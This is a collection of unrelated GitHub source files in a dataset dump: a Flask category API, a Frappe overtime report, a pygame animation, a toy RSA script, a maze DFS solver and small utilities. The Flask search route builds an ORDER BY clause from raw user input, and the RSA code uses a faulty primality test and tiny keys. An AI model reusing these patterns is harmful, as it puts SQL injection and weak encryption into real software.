open('summary_{}.csv'.format(dataset),'w')\n\n result_dir = os.path.join('./result', dataset)\n\n entries = os.listdir(result_dir)\n entries.sort()\n\n for entry in entries:\n\n if 'run_' in entry:\n continue\n \n result_file = os.path.join(result_dir, entry)\n\n if entry.startswith('trpo'):\n entry_result = np.load(result_file).mean(0).mean(0).mean(0).mean(0)\n elif entry.startswith('tcn'):\n entry_result = np.load(result_file).mean(0).mean(0)\n\n line = str(entry)\n for i in range(len(entry_result)):\n line += ','\n line += str(entry_result[i])\n line += '\\n'\n\n file.write(line)","repo_name":"Finspire13/RL-Surgical-Gesture-Segmentation","sub_path":"export_csv.py","file_name":"export_csv.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"99"} +{"seq_id":"16859206469","text":"from .writer import Writer\nfrom collections import OrderedDict\n\nclass CodeMethod(object):\n def __init__(self, generator, name, interface, description, implementation, executor):\n self.generator = generator\n self.name = name\n self.interface = interface\n self.description = description\n self.implementation = implementation\n self.executor = executor\n self.arguments = OrderedDict()\n \n def __str__(self):\n with Writer() as w:\n if self.interface:\n w.write('@interfacemethod(%s)' % repr(self.interface))\n w.put('def %s(self' % self.name)\n if self.arguments:\n for a in self.arguments.itervalues():\n w.put(', %s' % a.signature)\n w.put('):\\n')\n w.i()\n if self.description or self.arguments:\n w.write('\"\"\"')\n if self.description:\n self.write(self.description.strip())\n if self.arguments:\n if self.description:\n self.write()\n for n, a in self.arguments.iteritems():\n w.write(a.docstring)\n w.write('\"\"\"')\n w.put_indent()\n if self.implementation:\n if self.executor:\n w.put('self.context.executor(%s).' % repr(self.executor))\n else:\n w.put('self.context.executor().')\n if '/' in self.implementation:\n w.put('selc.context.executor().execute(self, %s' % repr(self.implementation))\n else:\n w.put('%s(self' % self.implementation)\n if self.arguments:\n for n in self.arguments:\n w.put(', %s' % n)\n w.put(')')\n else:\n w.put('pass')\n return str(w)\n","repo_name":"jcollado/aria-ng","sub_path":"src/generator/aria_generator/method.py","file_name":"method.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"18482949579","text":"from math import ceil\nfrom flask import Blueprint, jsonify, request, g\nfrom sqlalchemy import text\nfrom sqlalchemy.sql import or_\nfrom pospax import db\nfrom app.models import Category\nfrom app.schema import CategorySchema\n\ncategory_api = Blueprint('category_api', __name__, url_prefix='/api/category')\ncategorySchema = CategorySchema(many=True)\n\n\n@category_api.before_request\ndef before_request():\n\tg.sid = 1\n\tg.bid = 1\n\n\n@category_api.route('/list')\ndef category_list():\n\tcategories = Category.query.filter_by(site_id=g.sid, branch_id=g.bid, is_active='Y').all()\n\treturn jsonify({\n\t\t'categories': categorySchema.dump(categories).data\n\t})\n\n\n@category_api.route('/get', defaults={'id': ''})\n@category_api.route('/get/')\ndef category_get(id):\n\tcategory = Category(site_id=g.sid, branch_id=g.bid)\n\tif id:\n\t\tcategory = Category.query.filter_by(site_id=g.sid, branch_id=g.bid, is_active='Y', id=id).first()\n\tschema = CategorySchema()\n\treturn jsonify({\n\t\t'category': schema.dump(category).data\n\t})\n\n\n@category_api.route('/delete/')\ndef category_delete(id):\n\tresult = 0\n\tcategory = Category.query.filter_by(site_id=g.sid, branch_id=g.bid, id=id).first()\n\tif category:\n\t\tresult = category.id\n\t\tif category.is_active == 'N':\n\t\t\tdb.session.delete(category)\n\t\telse:\n\t\t\tcategory.is_active = 'N'\n\t\t\tdb.session.merge(category)\n\t\tdb.session.commit()\n\treturn jsonify({ 'result': result })\n\n\n@category_api.route('/save', methods=['POST'])\ndef category_save():\n\tresult = 0\n\tf = request.get_json()\n\tif f is None:\n\t\tf = request.form\n\n\tforms = {\n\t\t'site_id': g.sid,\n\t\t'branch_id': g.bid,\n\t\t'name': f.get('name') or '',\n\t\t'description': f.get('description') or ''\n\t}\n\n\tid = f.get('id') or None\n\tif id:\n\t\tcategory = Category.query.get(id)\n\t\tfor k, v in forms.iteritems():\n\t\t\tsetattr(category, k, v)\n\t\tdb.session.merge(category)\n\telse:\n\t\tcategory = Category()\n\t\tfor k, v in forms.iteritems():\n\t\t\tsetattr(category, k, v)\n\t\tdb.session.add(category)\n\tdb.session.commit()\n\n\tif category: result = category.id\n\treturn jsonify({ 'result': result })\n\n\n@category_api.route('/search', methods=['POST'])\ndef category_search():\n\tf = request.get_json()\n\tif f is None:\n\t\tf = request.form\n\tpage = f.get('page') or 1\n\trp = f.get('rp') or 10\n\tterm = f.get('term') or ''\n\tsort = f.get('sort') or None\n\tdesc = f.get('desc') or False\n\tactive = f.get('is_active') or 'Y'\n\n\tquery = Category.query.filter_by(site_id=g.sid, branch_id=g.bid, is_active=active)\n\tif term:\n\t\tquery = query.filter(or_(\n\t\t\tCategory.name.ilike('%' + term + '%'),\n\t\t\tCategory.description.ilike('%' + term + '%'),\n\t\t))\n\n\tif sort:\n\t\tquery = query.order_by(text(sort + ' ' + ('desc' if desc else 'asc')))\n\n\ttotal = query.count()\n\ttotal_pages = int(ceil(float(total) / rp))\n\tresults = page * rp\n\tpage_count = results if results <= total else total\n\n\tcategories = query.limit(rp).offset((page - 1) * rp)\n\treturn jsonify({\n\t\t'total': total,\n\t\t'total_pages': total_pages,\n\t\t'page_count': page_count,\n\t\t'categories': categorySchema.dump(categories).data\n\t})\n","repo_name":"ekkazit/bartender","sub_path":"app/apis/category.py","file_name":"category.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"74225229124","text":"import frappe\nfrom frappe import _\n\n\ndef execute(filters=None):\n\tif not filters:\n\t\tfilters = {}\n\tcolumns, data = [], []\n\t# att = frappe.db.sql(\"\"\"SELECT name,designation \n\t# \t FROM `tabAttendance` \n\t# \t WHERE docstatus = 1 \n\t# \t AND status = 'Present' \n\t# \t and designation is not null \"\"\",as_dict=1)\n\t# for attendance in att:\n\t# \tres_time = frappe.db.get_value(\"Designation\",attendance.designation,\"rest_time\")\n\t# \tif res_time:\n\t# \t\tfrappe.db.update(\"Attendance\",attendance.name,\"rest_time\",res_time)\n\t# \telse:\n\t# \t\tfrappe.db.update(\"Attendance\",attendance.name,\"rest_time\",0)\n\n\n\tconditions = get_conditions(filters)\n\tcolumns = get_columns()\n\tdata = get_results(filters,conditions)\n\n\treturn columns, data\n\n\ndef get_conditions(filters):\n\tconds = \"\"\n\tconds += \" AND company = %(company)s \" if filters.get(\"company\") else \"\"\n\tconds += \" AND attendance_date = %(attendance_date)s \" if filters.get(\"attendance_date\") else \"\"\n\tconds += \" AND designation = %(designation)s \" if filters.get(\"designation\") else \"\"\n\tconds += \" AND department = %(department)s \" if filters.get(\"department\") else \"\"\n\tconds += \" AND employee_group\t = %(employee_group)s \" if filters.get(\"employee_group\") else \"\"\n\treturn conds\n\ndef get_columns():\n\treturn [ _(\"Employee Name\") + \"::190\", _(\"ID. No.\") + \"::150\",_(\"Shift\") + \"::150\",_(\"Place of Work\") + \"::150\",_(\"Time In\") + \"::150\",_(\"Time Out\") + \"::150\",_(\"Overtime\") + \"::150\"]\n\t\n\ndef get_results(filters,conditions):\n\n\t# query = \"\"\"\n\t# \t\tSELECT \n\t# \t\t\temployee_name, \n\t# \t\t\tid_number, \n\t# \t\t\tshift, \n\t# \t\t\tplace_of_work,\n\t# \t\t\tSUBSTRING(time(in_time), 1, 5) AS in_time, \n\t# \t\t\tSUBSTRING(time(out_time), 1, 5) AS out_time,\n\t# \t\t\tCASE \n\t# \t\t\t\tWHEN ADDTIME(TIMEDIFF(out_time, in_time), '-08:00:00') < '00:00:00' THEN '0'\n\t# \t\t\t\tELSE \n\t# \t\t\t\t\tFORMAT(\n\t# \t\t\t\t\t\tFLOOR(\n\t# \t\t\t\t\t\t\tTIME_TO_SEC(\n\t# \t\t\t\t\t\t\t\tADDTIME(TIMEDIFF(out_time, in_time), '-08:00:00')\n\t# \t\t\t\t\t\t\t) / 3600\n\t# \t\t\t\t\t\t) + \n\t# \t\t\t\t\t\tFLOOR(\n\t# \t\t\t\t\t\t\tMOD(\n\t# \t\t\t\t\t\t\t\tTIME_TO_SEC(\n\t# \t\t\t\t\t\t\t\t\tADDTIME(TIMEDIFF(out_time, in_time), '-08:00:00')\n\t# \t\t\t\t\t\t\t\t),\n\t# \t\t\t\t\t\t\t\t3600\n\t# \t\t\t\t\t\t\t) / 1800\n\t# \t\t\t\t\t\t) * 0.5 +\n\t# \t\t\t\t\t\tFLOOR(\n\t# \t\t\t\t\t\t\tMOD(\n\t# \t\t\t\t\t\t\t\tTIME_TO_SEC(\n\t# \t\t\t\t\t\t\t\t\tADDTIME(TIMEDIFF(out_time, in_time), '-08:00:00')\n\t# \t\t\t\t\t\t\t\t),\n\t# \t\t\t\t\t\t\t\t1800\n\t# \t\t\t\t\t\t\t) / 900\n\t# \t\t\t\t\t\t) * 0.25,\n\t# \t\t\t\t\t\t2\n\t# \t\t\t\t\t)\n\t# \t\t\tEND AS overtime\n\t# \t\tFROM `tabAttendance`\n\t# \t\tWHERE docstatus = 1 {0}\n\t# \"\"\".format(conditions,filters)\n\n\tquery = \"\"\"\n\t\t\tSELECT \n\t\t\t\temployee_name, \n\t\t\t\tid_number, \n\t\t\t\tshift, \n\t\t\t\tplace_of_work,\n\t\t\t\tSUBSTRING(time(in_time), 1, 5) AS in_time, \n\t\t\t\tSUBSTRING(time(out_time), 1, 5) AS out_time,\n\t\t\t\tCASE \n\t\t\t\t\tWHEN ADDTIME(TIMEDIFF(out_time, in_time), '-08:00:00') < '00:00:00' THEN '0'\n\t\t\t\t\tELSE \n\t\t\t\t\t\tFORMAT(\n\t\t\t\t\t\t\tFLOOR(\n\t\t\t\t\t\t\t\tTIME_TO_SEC(\n\t\t\t\t\t\t\t\t\tADDTIME(TIMEDIFF(out_time, in_time), '-08:00:00')\n\t\t\t\t\t\t\t\t) / 3600\n\t\t\t\t\t\t\t) + \n\t\t\t\t\t\t\tFLOOR(\n\t\t\t\t\t\t\t\tMOD(\n\t\t\t\t\t\t\t\t\tTIME_TO_SEC(\n\t\t\t\t\t\t\t\t\t\tADDTIME(TIMEDIFF(out_time, in_time), '-08:00:00')\n\t\t\t\t\t\t\t\t\t),\n\t\t\t\t\t\t\t\t\t3600\n\t\t\t\t\t\t\t\t) / 1800\n\t\t\t\t\t\t\t) * 0.5 +\n\t\t\t\t\t\t\tFLOOR(\n\t\t\t\t\t\t\t\tMOD(\n\t\t\t\t\t\t\t\t\tTIME_TO_SEC(\n\t\t\t\t\t\t\t\t\t\tADDTIME(TIMEDIFF(out_time, in_time), '-08:00:00')\n\t\t\t\t\t\t\t\t\t),\n\t\t\t\t\t\t\t\t\t1800\n\t\t\t\t\t\t\t\t) / 900\n\t\t\t\t\t\t\t) * 0.25\n\t\t\t\t\t\t\t- rest_time,\n\t\t\t\t\t\t\t2\n\t\t\t\t\t\t)\n\t\t\t\tEND AS overtime\n\t\t\tFROM `tabAttendance`\n\t\t\tWHERE docstatus = 1 {0}\n\t\"\"\".format(conditions,filters)\n\tdata = []\n\tresults = frappe.db.sql(query, filters)\n\ttotal_ot = 0.00\n\tfor row in results:\n\t\ttotal_ot += float(row[-1])\n\t\tdata.append(row)\n\trow_end = ['Total','','','','','',total_ot]\n\tdata.append(row_end)\n\treturn data\n","repo_name":"maveeshah/Danisa","sub_path":"danisa/danisa/report/daily_attendance_sheet_with_overtime/daily_attendance_sheet_with_overtime.py","file_name":"daily_attendance_sheet_with_overtime.py","file_ext":"py","file_size_in_byte":3549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"26307702344","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nimport os\nfrom unittest import TestCase\n\nfrom floor.controller.playlist import Playlist, PlaylistItem, ProcessorNotFound\nfrom floor.processor import all_processors\n\nBASE_DIR = os.path.dirname(os.path.realpath(__file__))\nDEFAULT_PLAYLIST = BASE_DIR + \"/../../config/playlists/default.json\"\n\n\nclass PlaylistTest(TestCase):\n def setUp(self):\n self.all_procs = all_processors()\n\n def test_default_playlist(self):\n p = Playlist.from_file(DEFAULT_PLAYLIST, self.all_procs, strict=True)\n self.assert_(len(p.queue) > 0, \"Expected non-zero default playlist.\")\n\n def test_playlist_item_from_and_to_object(self):\n item = PlaylistItem.from_object(\n {\n \"name\": \"Animator\",\n },\n self.all_procs,\n )\n\n item_object = item.to_object()\n self.assertEqual(\n {\n \"name\": \"Animator\",\n \"title\": \"Animator\",\n \"args\": {},\n \"duration\": None,\n },\n item_object,\n )\n\n item = PlaylistItem.from_object(\n {\n \"name\": \"Animator\",\n \"title\": \"My Other Animator\",\n \"args\": {\"foo\": \"bar\"},\n \"duration\": 123,\n },\n self.all_procs,\n )\n\n item_object = item.to_object()\n self.assertEqual(\n {\n \"name\": \"Animator\",\n \"title\": \"My Other Animator\",\n \"args\": {\"foo\": \"bar\"},\n \"duration\": 123,\n },\n item_object,\n )\n\n def test_playlist_item_invalid_processor_name(self):\n with self.assertRaises(ProcessorNotFound):\n PlaylistItem.from_object(\n {\n \"name\": \"ZoopZap\",\n },\n self.all_procs,\n )\n","repo_name":"tennessee-garage/dance-floor","sub_path":"floor/floor/controller/playlist_test.py","file_name":"playlist_test.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"99"} +{"seq_id":"33904751926","text":"import pygame\nfrom pygame.locals import *\n\nSCREEN_WIDTH = 500\nSCREEN_HEIGHT = 500\nBG = (50,50,50)\nBLACK = (0,0,0)\n\nclass SpriteSheet():\n def __init__(self,image):\n self.sheet = image\n\n def get_image(self, width, height, scale, frame):\n image = pygame.Surface((width, height)).convert_alpha()\n image.blit(self.sheet, (0, 0), ((frame * width), 0, width, height))\n image = pygame.transform.scale(image, (width * scale, height * scale))\n image.set_colorkey(BLACK)\n return image\n\n\n\npygame.init()\nscreen = pygame.display.set_mode((SCREEN_WIDTH,SCREEN_HEIGHT))\npygame.display.set_caption('анимация')\n\nsprite_sheet_image = pygame.image.load('dino.png')\nsprite_sheet = SpriteSheet(sprite_sheet_image)\n\nanimation_list = []\nanimation_steps = [4,6,3,4,7]\n\nstep_counter = 0\nfor animation in animation_steps:\n temp_img_list = []\n for i in range(animation):\n k = sprite_sheet.get_image(24,24,3,step_counter)\n temp_img_list.append(k)\n step_counter +=1\n animation_list.append(temp_img_list)\n\nlast_update = pygame.time.get_ticks()\nanimation_cooldown = 500\nframe = 0\naction = 0\nrunning = True\n\nwhile running:\n for event in pygame.event.get():\n if event.type == QUIT:\n running = False\n if event.type == KEYDOWN:\n if event.key == K_DOWN and action > 0:\n action -=1\n frame = 0\n\n if event.key == K_UP and action < len(animation_list)-1:\n action += 1\n frame = 0\n\n if event.key == K_1:\n action = 0\n frame = 0\n if event.key == K_2:\n action = 1\n frame = 0\n if event.key == K_3:\n action = 2\n frame = 0\n if event.key == K_4:\n action = 3\n frame = 0\n if event.key == K_5:\n action = 4\n frame = 0\n\n\n\n screen.fill(BG)\n\n screen.blit(animation_list[action][frame],(0,0))\n\n current_time = pygame.time.get_ticks()\n if current_time-last_update >= animation_cooldown:\n frame += 1\n if frame >= len(animation_list[action]):\n frame = 0\n\n last_update = current_time\n\n\n\n pygame.display.update()\n\npygame.quit()\n","repo_name":"blackcoster/Games2Lessons","sub_path":"Lesson42/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"19082685074","text":"# Key generation\n\ndef isPrime(num):\n\tfor i in range(2,num):\n\t\tif (num % i) == 0:\n\t\t\tprime = False\n\t\telse:\n\t\t\tprime = True\n\treturn prime\n\ndef find_nearest_prime(num):\n\twhile num < 100000:\n\t\tif isPrime(num):\n\t\t\treturn num\n\t\telse:\n\t\t\tnum += 1\n\n# let's split the coprime function into smaller functions to simply get factors\n\ndef get_factors(num):\n\tfactors = []\n\tfor i in range(2,num):\n\t\tif ((num % i) == 0):\n\t\t\tfactors.append(i)\n\treturn factors\n\n# this function tests whether two numbers are coprime - i.e. if they have any common factors other than one and themselves.\n# seems to be working now, having separately defined the get_factors function\n\ndef isCoprime(num1,num2):\n\tnum1_factors = get_factors(num1)\n\tnum2_factors = get_factors(num2)\n\tif set(num1_factors).isdisjoint(set(num2_factors)):\n\t\t# print('no common factors - they coprime!')\n\t\treturn True\n\telse:\n\t\t# print('there are common factors, not coprime')\n\t\treturn False\n\n# check through candidate numbers that satisfy the conditions for the private key e. \n\ndef find_e(n,phi_n):\n\tcandidates = []\n\tfor i in range(3,n):\n\t\tif isPrime(i):\n\t\t\tif((isCoprime(i,n)) and (isCoprime(i,phi_n))):\n\t\t\t\tcandidates.append(i)\n\treturn candidates\n\n# find d (the private key part 1)\ndef find_d(prime1,n):\n\tfor i in range(prime1,n):\n\t\tif (((i*e) % phi_n) == 1):\n\t\t\tprint(i)\n\t\t\treturn i\n\n# pick two large prime numbers:\n\n# ==== first prime number\n\nprint(\"let's generate the first of two prime numbers.\")\n\nuser_entropy = input(\"please generate some entropy by typing lots of random characters: \")\nentropy = 0\nfor letter in user_entropy:\n\tentropy = entropy + ord(letter)\n\nprint(entropy)\n\n# use entropy value to select a prime number\n\nprime1 = find_nearest_prime(entropy)\nprint(\"the first prime number is: %s\" % prime1)\n\n# ===== second prime number\n\nprint(\"let's generate the second of two prime numbers.\")\n\nuser_entropy = input(\"please generate some entropy by typing lots of random characters: \")\nentropy = 0\nfor letter in user_entropy:\n\tentropy = entropy + ord(letter)\n\nprint(entropy)\n\n# use entropy value to select a prime number\n\nprime2 = find_nearest_prime(entropy)\nprint(\"the second prime number is: %s\" % prime2)\n\n\n# ==== generate N (second part of public and private keypairs)\n\nn = prime1*prime2\n\nprint(\"N will be %s\" % n)\n\n# calculate Φ(N) = (p-1) (q-1)\n\nphi_n = ((prime1-1)*(prime2-1))\n\n# choose E\n\nprint(\"Searching for e ... please wait\")\n\ne = find_e(n,phi_n)\n\n# at this point we have a long list of candidates for e. let's let the user select one by entering a random number\n\nchoice_e = input(\"to choose a particular e, pick a random number between 1 and %s: \" % len(e))\n\ne = e[int(choice_e)]\n\n# find d\n\nd = find_d(prime1,n)\n\n# let's put those keys into a nice dictionary\n\n# Example keypair:\n\nname = input('Please enter a name for this keypair (e.g. reuben_keypair): ')\n\npublic_key = {'e':e, 'n':n}\nprivate_key = {'d':d, 'n':n}\n\nprint(\"Saving key pair %s_.txt to working directory. Put it somewhere safe!\" % name)\n\nkey_file = open(\"%s.txt\" % name, \"w\")\nkey_file.write(\"%s, %s\" % (public_key, private_key))\nkey_file.close()\n\n# Encryption and decryption\n\ndef encrypt(pt):\n\tprint('encrypting message ... ')\n\treturn (pt ** public_key['e']) % public_key['n']\n\ndef decrypt(ct):\n\treturn (ct ** private_key['d'] % public_key['n'])","repo_name":"RDBinns/diy_rsa","sub_path":"aressay.py","file_name":"aressay.py","file_ext":"py","file_size_in_byte":3269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"40922851563","text":"# 상세 화면에서 보여줄 직선 그래프\n\nimport pandas as pd\nimport datetime\nfrom dateutil.relativedelta import relativedelta\nimport requests\nimport config\nimport json\n\ndef chart1(wealth_result):\n data = wealth_result[\"trade_lnfo\"]\n print(\"chart1 data /////\")\n # print(data)\n # 거래내역이 비어있지 않을때 \n if len(data) > 0 :\n # 거래내역으로 데이터 프레임제작\n df = pd.DataFrame(data)\n # 거래일별 소비금액 계산\n df_data = df.groupby('tran_datetime')[['tran_amt']].sum()\n # 소비금액이 0 인 날짜가 있다면 추가로 넣어주는 작업\n date_list = wealth_result[\"day_list\"]\n set(df_data.index)\n set(date_list)\n blank_list = set(date_list)- set(df_data.index)\n blank_list\n for date in blank_list :\n df_data.loc[date] = [0]\n \n # 날짜 순서대로 정렬 후 마무리\n df_data = df_data.sort_index()\n df_data.reset_index(drop=False, inplace=True)\n\n # 시작날짜의 통장 잔액의 합계 week_money\n week_money = wealth_result[\"week_money\"]\n # 빈 데이터 프레임 만들어서 0으로 채워넣기\n df2 = pd.DataFrame(index=range(0,7),columns=['tran_datetime', 'tran_amt'])\n df2 = df2.fillna(0)\n # week_money에서 일별 소비금액을 제해 일별 잔액 계산\n for i in range(7) :\n if i == 0 :\n df2.iloc[i, 0] = date_list[i]\n df2.iloc[i, 1] = week_money - df_data.iloc[i, 1]\n else :\n df2.iloc[i, 0] = date_list[i]\n df2.iloc[ i, 1] = df2.iloc[ i - 1 , 1] - df_data.iloc[i, 1]\n\n # 차트로 넘겨줄 데이터 정리\n chart1_x = df_data['tran_datetime'].tolist()\n chart1_y = df_data['tran_amt'].tolist()\n chart2_x = df2['tran_datetime'].tolist()\n chart2_y = df2['tran_amt'].tolist()\n\n\n\n\n return {\"chart1_x\" : chart1_x, \"chart1_y\":chart1_y, \"chart2_x\":chart2_x, \"chart2_y\":chart2_y}\n\n","repo_name":"jkong72/ginkgo-lambda-flask-api","sub_path":"charts/chart1.py","file_name":"chart1.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"70421913924","text":"from torchvision.models import resnet18\nfrom torch import nn\nimport torch\n\nclass Net(nn.Module):\n\n def __init__(self,out_features):\n super(Net, self).__init__()\n self.headbone = resnet18(True)\n self.headbone.fc = nn.Sequential(\n nn.Linear(512, out_features)\n )\n\n def forward(self,x):\n x = self.headbone(x)\n return x\n\nif __name__ == '__main__':\n m = Net(3)\n print(m)\n x = torch.randn(2,3,112,112)\n print(m(x).shape)","repo_name":"HibikiJie/ClassificationFramework","sub_path":"models/resnet18.py","file_name":"resnet18.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"39993965016","text":"#-------------------------------------------------------------------#\t\t\t\t \r\n#\tDevin Suy\r\n# ID: 017001983\r\n#\tDate: 7/14/2020\r\n#\temail: DevinSuy@gmail.com\r\n# version: 1.0.0\r\n#------------------------------------------------------------------\r\nfrom Board.GameBoard import GameBoard\r\nimport sys\r\n\r\nclass DFS:\r\n def __init__(self, graph, file_name, output_folder):\r\n self.graph = graph\r\n self.file_name = file_name[:-8] # Trim to just the \"size\" of the maze\r\n self.output_folder = output_folder\r\n self.num_expanded = self.max_fringe = self.current_fringe = 0\r\n\r\n self.solutions = []\r\n self.current_solution = []\r\n self.solutions_nums = []\r\n self.current_solution_nums = []\r\n\r\n self.start_cell = self.graph.cells[self.graph.start_cell]\r\n self.goal_cell = self.graph.cells[self.graph.goal_cell]\r\n\r\n \r\n def reset_stats(self):\r\n self.solutions.clear()\r\n self.current_solution.clear()\r\n self.solutions_nums.clear()\r\n self.current_solution_nums.clear()\r\n self.num_expanded = self.max_fringe = self.current_fringe = 0\r\n\r\n \r\n # Depth First Search algorithm using LIFO stack\r\n def DFS(self):\r\n stack = [self.start_cell] # Initialize our stack with our starting cell\r\n self.start_cell.visited = True\r\n \r\n while stack:\r\n current_cell = stack[-1] # Poll the head of our \"stack\"\r\n\r\n # This is our first time at this node, expand it\r\n if not current_cell.visited:\r\n self.num_expanded += 1\r\n\r\n current_cell.visited = True\r\n\r\n # Bookkeeping\r\n if len(stack) > self.max_fringe:\r\n self.max_fringe = len(stack)\r\n \r\n # Process all unvisited neighbors of our curent cell\r\n dead_end = True\r\n for adj_cell_num, adj_cell in current_cell.adj.items():\r\n if adj_cell_num == self.graph.goal_cell:\r\n print(\"\\nDFS First Solution Found!\\n-------------------------\")\r\n \r\n # Retrace the solution path\r\n current_solution = [adj_cell]\r\n path_cell = current_cell\r\n\r\n while path_cell != False:\r\n current_solution.append(path_cell)\r\n path_cell = path_cell.prev\r\n\r\n # Change the ordering of cells from end -> start to start -> end\r\n return current_solution[::-1]\r\n \r\n else:\r\n if not adj_cell.visited:\r\n dead_end = False\r\n stack.append(adj_cell)\r\n adj_cell.prev = current_cell # Maintain a parent pointer so we can retrace our solution path\r\n break # Process one neighbor at a time, advance \"deeper\" until backtracked\r\n \r\n # If there are no futher neighbors to traverse deeper into\r\n # remove from stack and backtrack\r\n if dead_end:\r\n stack.pop() \r\n\r\n # If the queue empties without finding a solution, all have been found\r\n return False \r\n\r\n\r\n def exhaustive_DFS_util(self, src, dst):\r\n src.visited = True\r\n self.current_solution_nums.append(src.cell_num)\r\n self.current_solution.append(src)\r\n\r\n # Goal cell was reached, save the solution\r\n if src == dst:\r\n self.solutions_nums.append(self.current_solution_nums[::-1]) # Append the reversed path\r\n self.solutions.append(self.current_solution[::-1])\r\n\r\n # Otherwise, process neighbors\r\n for adj_id, adj_node in src.adj.items():\r\n if not adj_node.visited:\r\n self.current_fringe += 1\r\n if self.current_fringe > self.max_fringe:\r\n self.max_fringe = self.current_fringe\r\n \r\n self.exhaustive_DFS_util(adj_node, dst) # Recurr\r\n\r\n # If here we reached a dead end, no more unvisited adjacent\r\n # neighbors to traverse deeper into, backtrack\r\n self.current_solution_nums.pop()\r\n self.current_solution.pop()\r\n src.visited = False\r\n src.completed = True\r\n self.current_fringe -= 1\r\n\r\n\r\n def find_first_solution(self):\r\n self.graph.reset_cells()\r\n self.reset_stats()\r\n solution = self.DFS()\r\n \r\n # Output results\r\n print(\"Path: \", [cell.cell_num for cell in solution] )\r\n print(\"Solution Length: \", len(solution), \"\\n\")\r\n print(\"(DFS First Solution) Number of Expanded Nodes: \", self.num_expanded)\r\n print(\"(DFS First Solution) Max Fringe Size: \", self.max_fringe, \"\\n\\n\")\r\n\r\n self.graph.write_solution(self.file_name + \"_DFS_First_Solution\", self.output_folder.joinpath(\"DFS\"), solution)\r\n self.graph.write_solution(self.file_name + \"_DFS_First_Solution\", self.output_folder.joinpath(\"DFS/DFS_All_\" + self.file_name + \"_Solutions\"), solution)\r\n\r\n\r\n def perform_search(self):\r\n self.graph.reset_cells()\r\n self.reset_stats()\r\n\r\n # Start DFS from the initial cell to goal\r\n self.exhaustive_DFS_util(self.start_cell, self.goal_cell)\r\n\r\n # Print all solution numbers\r\n solution_count = 1\r\n for solution in self.solutions_nums:\r\n solution = solution[::-1]\r\n print(\"(DFS Exhaustive) Solution #\", solution_count, \" length: \", len(solution))\r\n # print(\"Path: \", solution)\r\n solution_count += 1\r\n print(\"(DFS Exhaustive) Number of Expanded Nodes: \", len(self.graph.cells))\r\n print(\"(DFS Exhaustive) Max Fringe Size: \", self.max_fringe, \"\\n\\n\")\r\n\r\n # Write all solutions to maze .lay files and locate the optimal least cost solution\r\n solution_count = 1\r\n min_solution = None\r\n min_cost = float('inf')\r\n for solution in self.solutions:\r\n solution = solution[::-1]\r\n if len(solution) < min_cost:\r\n min_cost = len(solution)\r\n min_solution = solution\r\n\r\n self.graph.write_solution(self.file_name + \"_DFS_Solution_\" + str(solution_count), self.output_folder.joinpath(\"DFS/DFS_All_\" + self.file_name + \"_Solutions\"), solution)\r\n solution_count += 1\r\n \r\n print(\"All solutions written to :\", self.output_folder.joinpath(\"DFS/DFS_All_\" + self.file_name + \"_Solutions\"))\r\n \r\n print(\"\\nOptimal DFS solution located, length: \", min_cost)\r\n optimal_path = [cell.cell_num for cell in min_solution] \r\n # print(\"Path: \", optimal_path)\r\n\r\n # Write the optimal solution\r\n self.graph.write_solution(self.file_name + \"_DFS_Optimal_Solution\", self.output_folder.joinpath(\"DFS\"), min_solution)\r\n print(\"Optimal solution written to: \", self.output_folder.joinpath(\"DFS\"), \"\\\\\", self.file_name + \"_DFS_Optimal_Solution.lay\")\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n ","repo_name":"devinsuy/P2P-File-Sync","sub_path":"Demo/2_file_set/DFS.py","file_name":"DFS.py","file_ext":"py","file_size_in_byte":7198,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"19105219253","text":"import requests\n\n\nclass Cotizacion:\n def __init__(self,moneda_ref,moneda_cambio,tiempo_ref=60 ):\n self.moneda_ref = moneda_ref\n self.moneda_cambio = moneda_cambio\n self.tiempo_ref = tiempo_ref\n self.base_url = 'https://api.coinbase.com/v2/exchange-rates?currency='\n self.actualizar()\n\n \n def actualizar(self):\n r = requests.get(self.base_url + self.moneda_cambio)\n self.valor_str = r.json()[\"data\"][\"rates\"][self.moneda_ref]\n self.valor = \"{:.2f}\".format(float(self.valor_str))\n # self.valor = solicita_nuevo_precio_de(self.moneda_ref, self.moneda_cambio)\n \n\n def dame_txt(self):\n self.actualizar()\n return self.moneda_ref + ' - ' + f\"{self.valor}\" + \\\n self.moneda_cambio \n","repo_name":"MargaLop/exchange_clases","sub_path":"cotizacion.py","file_name":"cotizacion.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"13448186910","text":"\"\"\"\n\"()(())\"\noutput: 6\n\nInput: \")()())\"\nOutput: 4\n\"\"\"\n\n\nclass Solution(object):\n def longestValidParentheses(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n if not s or len(s) == 0: return 0\n n = len(s)\n maxLen = 0\n\n stack = [-1]\n for i in range(len(s)):\n if stack[-1] != -1 and s[stack[-1]] == \"(\" and s[i] == \")\":\n stack.pop()\n maxLen = max(maxLen , i - stack[-1])\n else:\n stack.append(i)\n return maxLen\n\n\"\"\"\n// Time: O(n), Space: O(n)\nhttps://algocasts.io/episodes/n5GqbVpA\n答案:\n1.algocasts 里的p,代表的就是stack 